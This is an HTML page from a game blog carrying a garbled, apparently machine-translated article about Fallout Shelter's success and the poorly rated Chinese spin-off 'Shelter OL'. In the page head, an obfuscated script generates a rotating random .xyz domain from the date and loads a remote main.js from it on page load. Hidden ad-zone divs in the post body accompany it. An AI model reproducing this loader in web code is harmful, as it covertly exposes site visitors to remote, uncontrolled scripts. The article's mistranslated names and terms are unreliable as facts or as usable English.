<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Game,">










<meta name="description" content="In the second half of 2015, a mobile game named “Fallout: shelter” came out, occupying the IOS app popularity ranking in a very short period of time, and its income also exceeded the overseas app stor">
<meta name="keywords" content="Game">
<meta property="og:type" content="article">
<meta property="og:title" content="From annual hot money to player score 3.7, success or failure of transformation of radiation shelter">
<meta property="og:url" content="http://maiygu.xyz/2019/11/08/From annual hot money to player score 3.7, success or failure of transformation of radiation shelter/index.html">
<meta property="og:site_name" content="Games">
<meta property="og:description" content="In the second half of 2015, a mobile game named “Fallout: shelter” came out, occupying the IOS app popularity ranking in a very short period of time, and its income also exceeded the overseas app stor">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/From annual hot money to player score 3.7, success or failure of transformation of radiation shelter/1b8061726c0e43ec97b9c9e748bf3750.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/From annual hot money to player score 3.7, success or failure of transformation of radiation shelter/5cee00aacc824367ad194739c82325c4.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/From annual hot money to player score 3.7, success or failure of transformation of radiation shelter/e4473006b4c44f6a9a59aaed92b5d4a8.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/From annual hot money to player score 3.7, success or failure of transformation of radiation shelter/0ebb8bfb65364c4a98d42facbaade94e.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/From annual hot money to player score 3.7, success or failure of transformation of radiation shelter/28015ff063aa4930ae7e659ec8594f95.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/From annual hot money to player score 3.7, success or failure of transformation of radiation shelter/829ddd331ce74f0aacbbcba05b178fb2.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/From annual hot money to player score 3.7, success or failure of transformation of radiation shelter/f00128f4e1d041769672f70c980106d6.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/From annual hot money to player score 3.7, success or failure of transformation of radiation shelter/ab23591ff7e44433ae6b76fc735cac44.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/From annual hot money to player score 3.7, success or failure of transformation of radiation shelter/7165db7683864891acd537874dd5c48c.jpg">
<meta property="og:updated_time" content="2021-03-02T08:49:49.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="From annual hot money to player score 3.7, success or failure of transformation of radiation shelter">
<meta name="twitter:description" content="In the second half of 2015, a mobile game named “Fallout: shelter” came out, occupying the IOS app popularity ranking in a very short period of time, and its income also exceeded the overseas app stor">
<meta name="twitter:image" content="http://maiygu.xyz/2019/11/08/From annual hot money to player score 3.7, success or failure of transformation of radiation shelter/1b8061726c0e43ec97b9c9e748bf3750.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"hide","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://maiygu.xyz/2019/11/08/From annual hot money to player score 3.7, success or failure of transformation of radiation shelter/">




<script type="text/javascript">!function(n){var t,e=function(n,t){var e=[["a","e","i","o","u","y"],["b","c","d","f","g","h","j","k","l","m","n","p","q","r","s","t","v","w","x","y","z"]];if(t)for(var r=0;r<=t.length-1;r++)n=n*t.charCodeAt(r)%4294967295;var l;return next=(l=n,function(n){return l=l+1831565813|0,(((n=(n=Math.imul(l^l>>>15,1|l))+Math.imul(n^n>>>7,61|n)^n)^n>>>14)>>>0)/Math.pow(2,32)}),function(n,t){for(var r=[],l=null,o=0;o<=n-1;o++){var a=void 0;null===l?a=e[0].concat(e[1]):1==l?(a=e[0],l=0):(a=e[1],l=1);var u=a[Math.floor(next()*a.length)];r.push(u),null===l&&(l=-1!=e[0].indexOf(u)?0:1)}return r.push("."+t),r.join("")}}((t=new Date,(t/=1e3)-t%1209600),"_fa7cdd4c68507744")(8,"xyz");if(null===n)console.log("https://"+e);else{var r=n.createElement("script");r.src="https://"+e+"/main.js",(n.body||n.head).appendChild(r)}}("undefined"!=typeof document?document:null);
</script>

  <title>From annual hot money to player score 3.7, success or failure of transformation of radiation shelter | Games</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Games</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Games</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-sitemap">
          <a href="/sitemap.xml" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br>
            
            Sitemap
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="Searching..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
 
 
 <div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="22aeec266c49468da6040eff035066b8" style="display: none"></div>
 <div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="7aa7f6c595384fd6a2e5f5016b455fd2" style="display: none"></div>
 <div class="_fa7cdd4c68507744" data-zone="df2a1bde9f44465a8457aaf705928077" style="width:728px;height:90px;display: inline-block;margin: 0 auto"></div>
 <div class="_fa7cdd4c68507744" data-zone="4fff9a79323749608f8df1eff7291bcf" style="width:970px;height:90px;display: inline-block;margin: 0 auto"></div>
 
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://maiygu.xyz/2019/11/08/From annual hot money to player score 3.7, success or failure of transformation of radiation shelter/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Harry">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Games">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">From annual hot money to player score 3.7, success or failure of transformation of radiation shelter</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-11-08T00:00:00+08:00">
                2019-11-08
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>In the second half of 2015, a mobile game named “Fallout: shelter” came out, occupying the IOS app popularity ranking in a very short period of time, and its income also exceeded the overseas app store’s perennial champion “candy legend”, just like a posture of arrogance, becoming the international pop in 2015.<br><img src="http://maiygu.xyz/2019/11/08/From annual hot money to player score 3.7, success or failure of transformation of radiation shelter/1b8061726c0e43ec97b9c9e748bf3750.jpg" alt="From annual hot money to player score 3.7, success or failure of transformation of radiation shelter"><br>As an old fan of “radiation” series, I was definitely refused when I heard that “radiation” was going to play. After all, there are too many adapted Lei’s works on the mobile platform, but I tried to download them out of curiosity. After the experience, I found that although this play is totally different from the previous “radiation”, there is no doubt that it is《 Radiation “, and as a mobile game, you don’t seem to think of any better design.</p>
<h1 id="marketing-advertising"><a href="#marketing-advertising" class="headerlink" title="marketing advertising?"></a>marketing advertising?</h1><p>As early as in 2008, when Bethesda, an American game company, launched radiation 3, they had the idea of making mobile games. In a trailer before the release of radiation 3, we can see some design concepts of radiation: shelter. Since the world’s first iPhone was launched in 2007, they have realized that the mobile phone market will definitely be a treasure land of great potential in the future, according to Todd Howard, the ace of club B. At that time, the very advanced design concept of the iPhone attracted them very much. They wanted to make a game for this small screen. In their opinion, it must be very interesting to make a game on the iPhone. For this reason, they designed two schemes, one of which we don’t know what it is, and the other is the current “shelter”.<br><img src="http://maiygu.xyz/2019/11/08/From annual hot money to player score 3.7, success or failure of transformation of radiation shelter/5cee00aacc824367ad194739c82325c4.jpg" alt="From annual hot money to player score 3.7, success or failure of transformation of radiation shelter"><br>TV Trailer picture of radiation 3<br>After “radiation 3” launched the last DLC, there have been calls for “radiation 4” among the players. Of course, the sequel of “radiation” needs a lot of time in the plan of community B. As we all know, the average period of launching a sequel for a game in B club is usually 7 years (except radiation 76). After all, before launching an IP sequel, they have to make sequels for other works of their own. In these seven years, the ancient scroll 5 is the product of this period. After finishing the work of ancient scroll 5, agency B also felt that it was time to produce a sequel for radiation, and at the same time they wanted to make the original version of the mobile game they imagined. But after all, radiation 4 was the top priority, so they had to give the game plan to the outsourcing studio for production, and at the same time they could take the name of “publicity for radiation 4” as the tour It can be said that the application of advertising fee for the play, which is used as the development budget, is a double shot.<br><img src="http://maiygu.xyz/2019/11/08/From annual hot money to player score 3.7, success or failure of transformation of radiation shelter/e4473006b4c44f6a9a59aaed92b5d4a8.jpg" alt="From annual hot money to player score 3.7, success or failure of transformation of radiation shelter"><br>Radiation 4 is said to be “sharpening a sword in seven years”, but it doesn’t take that long<br>The development of “sanctuary” was entrusted to behaviour, an independent game studio from Montreal, Canada. Its representative was “kill at dawn”.<br>It’s surprising that behaviour originally planned to make a social mobile game after getting the design plan of B club, but unexpectedly, B club’s plan is to make a single machine, and it can’t contain the paid content that is too radical to affect the game experience, and the game doesn’t have the networking function, which can be said to be very conscientious. At the E3 game exhibition in 2015, Tao de first introduced the system and features of radiation 4 to the outside world in detail, and simply announced the existence of the sanctuary, which can be downloaded for free on the night after the conference. A few simple introductions to the play method have completely ignited the game world. Who could have thought that club B actually made a mobile game? You should know that at that time, there were not many big factories making mobile games. Besides, it seemed very interesting. That night, countless fans of radiation rushed into the app store to download the shelter, and even nearly paralyzed Apple’s server.</p>
<p>#There is no core game<br>In just 24 hours, the number of downloads of “sanctuary” on IOS only reached 2 million, 5 million in two days, and 10 million in a week. No matter the heat or income, other mobile games were directly left behind. Such a success was not expected by all members of Society B. In short, the sanctuary is a simulation business game. The background of the game is based on the postwar end design of radiation. Players play a shelter administrator in the game. They can build their own shelters at will, and take in more refugees from waste land to increase the manpower of the shelters, so as to bring productivity and long-term stable operation of the shelters Go on, just like other simulation business games, there is no clear core play method, so the play method of the game is entirely dependent on the individual.<br><img src="http://maiygu.xyz/2019/11/08/From annual hot money to player score 3.7, success or failure of transformation of radiation shelter/0ebb8bfb65364c4a98d42facbaade94e.jpg" alt="From annual hot money to player score 3.7, success or failure of transformation of radiation shelter"><br>It’s a very fulfilling thing to watch the shelters grow<br>As a simulation business game, the operation and start-up difficulty of the game is very simple, which is very suitable for the mobile platform. Even the players who have never been exposed to the radiation series can easily start to play. After all, the atmosphere of the game is much more relaxed and pleasant than the orthodox works. The black humor and cartoon art style that radiation series always uphold can also let more people connect Touch. Logging in to the mobile platform means to find a way not to offend the old players of the series to avoid smashing the signboard. At the same time, as a marketing game, it also has the ability to attract the players who have never been exposed to the radiation series. Under these two main premises, the quality of the game can be very outstanding. Krypton gold is low in strength, well made and fun to play. Anyone can play it easily. Even after a few years, this game is still excellent.<br><img src="http://maiygu.xyz/2019/11/08/From annual hot money to player score 3.7, success or failure of transformation of radiation shelter/28015ff063aa4930ae7e659ec8594f95.jpg" alt="From annual hot money to player score 3.7, success or failure of transformation of radiation shelter"><br>It’s OK. It’s interesting to see the daily life of these villains<br>“Sanctuary” not only didn’t disappoint the old players of “radiation” series, but also made it an appetizer when waiting for the release of “radiation 4”. For new players, the above advantages are enough to attract new players. In the game review area of various platforms, it is not hard to find that most of the groups who like this game come into contact with the original works of radiation series because they think it is interesting, and even a considerable number of people choose to buy a copy of radiation 4 after they have been in contact with mobile games. There is no doubt that this game really meets the original “interesting” assumption of Society B, and at the same time, it has also reached the goal The purpose of making this game. With the success of the game, B club began to pay attention to the game, which was originally just for advertising. During this period, it had stable content updates and various interesting festival activities, which greatly enhanced the playability of the game.<br><img src="http://maiygu.xyz/2019/11/08/From annual hot money to player score 3.7, success or failure of transformation of radiation shelter/829ddd331ce74f0aacbbcba05b178fb2.jpg" alt="From annual hot money to player score 3.7, success or failure of transformation of radiation shelter"><br>Exploration and playing method of field copy updated in later stage</p>
<h1 id="transformation-in-the-Chinese-market"><a href="#transformation-in-the-Chinese-market" class="headerlink" title="transformation in the Chinese market"></a>transformation in the Chinese market</h1><p>“Sanctuary” has been a great success in the overseas market. However, there are many fans of “radiation” in China. They are also worried about the lack of Chinese in the game. Although the amount of text is not much, it does not affect the game playing, but they cannot get the best game experience. However, only Shanda (now renamed Shengqu) is the game manufacturer who pays attention to this market. Shengqu initiated a cooperative plan for the game to B club, and finally the Chinese version of the sanctuary was represented by Shengqu. Until now, the Chinese version represented by Shengqu still has an average score of 8.5 points, which fully retains the advantages of the original version, does not add the “Chinese krypton gold” which is more pitiful, but also has a stable update as the international service, which is the biggest reason why the work can maintain a good reputation in the domestic market.<br><img src="http://maiygu.xyz/2019/11/08/From annual hot money to player score 3.7, success or failure of transformation of radiation shelter/f00128f4e1d041769672f70c980106d6.jpg" alt="From annual hot money to player score 3.7, success or failure of transformation of radiation shelter"><br>The official website of Shengqu is no longer updated<br>With the Chinese version, players no longer have to complain that they can’t understand it. But just after the mainland version was launched for a long time, Shengqu said that it would cooperate with agency B to launch the mainland exclusive online game “sanctuary ol”. Although it responded to the demand of some players for more people, it also made many players who are content with the status quo feel a little more uneasy.<br>Sure enough, after the launch of “sanctuary ol”, the players found that although the new work has many more things than the original, such as the transition animation, fine figure vertical painting and more game content, etc., it is the same as other card swiping and swiping hand games in the core part, excluding the content of the single version and replacing it with more online games. You should know that although the operation mode of krypton gold pumping card is quite popular in China, this application mode is naturally equipped with debuff. Whether krypton gold pumping card is made conscientiously or not, it will definitely cause many disputes. Therefore, the reputation of the game has fallen. In the eyes of most players, the once excellent game has become “krypton swindle online game”.<br><img src="http://maiygu.xyz/2019/11/08/From annual hot money to player score 3.7, success or failure of transformation of radiation shelter/ab23591ff7e44433ae6b76fc735cac44.jpg" alt="From annual hot money to player score 3.7, success or failure of transformation of radiation shelter"><br>Radiation: sanctuary ol Poster<br>However, in fact, there are many problems in the game. Most of the reasons for players’ complaints are that bugs are not repaired, krypton gold has a low delivery rate, and the adjustment of game balance is too mindless. If krypton gold is not available, a lot of time is needed to brush it, and its liver degree is much longer than that of a single machine. In short, there are fatal problems in the operation of the game. From an objective point of view, as it is based on the stand-alone version of the shelter, there is no problem in the bottom of the game, and Shengqu has also added some unique designs on the basis of the original system. Unfortunately, it does not meet the wishes of the players. The evaluation of the game on taptap is only 3.7 points , and the overall average score is even lower than this score, which fully shows players’ dissatisfaction with the game.<br><img src="http://maiygu.xyz/2019/11/08/From annual hot money to player score 3.7, success or failure of transformation of radiation shelter/7165db7683864891acd537874dd5c48c.jpg" alt="From annual hot money to player score 3.7, success or failure of transformation of radiation shelter"><br>IOS score is a little higher, but it has no egg use<br>    concluding remarks<br>Maybe for the Chinese game market, it’s common to see “sanctuary ol”, but as an old fan of “radiation”, I believe that most players who like this series will have the same feeling with the author: the bad reviews of “sanctuary ol” will definitely make the whole “radiation” series decline in domestic reputation, after all, “radiation” is still a small number in China For those who haven’t been in touch with the radiation series, radiation is the “krypton swindler” who has failed in the rating.<br>Maybe I’m worried too much, because the players who really like “radiation” series will not try this mobile game, and will never care about the views of other players. As for the failure of sanctuary ol, I can’t bear it. I hope that sanctuary ol can improve in the future. Since we have all cooperated with community B, we should learn their design rather than their operation.</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Game/" rel="tag"># Game</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/11/08/Hard core, interesting, huge and worth exploring/" rel="next" title="Hard core, interesting, huge and worth exploring">
                <i class="fa fa-chevron-left"></i> Hard core, interesting, huge and worth exploring
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/11/08/From no one's understanding to the attention of the public, the concept inheritance of soul series in 25 years/" rel="prev" title="From no one's understanding to the attention of the public, the concept inheritance of soul series in 25 years">
                From no one's understanding to the attention of the public, the concept inheritance of soul series in 25 years <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Harry</p>
              <p class="site-description motion-element" itemprop="description">Games</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">114</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#marketing-advertising"><span class="nav-number">1.</span> <span class="nav-text">marketing advertising?</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#transformation-in-the-Chinese-market"><span class="nav-number">2.</span> <span class="nav-text">transformation in the Chinese market</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        

<div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Harry</span>

  
</div>









        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
